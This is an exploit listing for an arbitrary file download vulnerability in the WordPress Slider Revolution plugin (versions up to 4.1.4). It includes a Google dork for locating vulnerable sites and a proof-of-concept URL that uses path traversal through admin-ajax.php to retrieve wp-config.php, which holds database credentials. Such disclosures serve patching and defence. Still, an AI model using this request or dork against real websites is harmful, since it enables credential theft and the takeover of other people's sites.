WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download

# Exploit Title : WordPress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download vulnerability

# Software Link : Premium plugin

# Dork Google: revslider.php "index of"

# Description
Wordpress Slider Revolution Responsive <= 4.1.4 suffers from Arbitrary File Download vulnerability
######################
# PoC
http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Share This :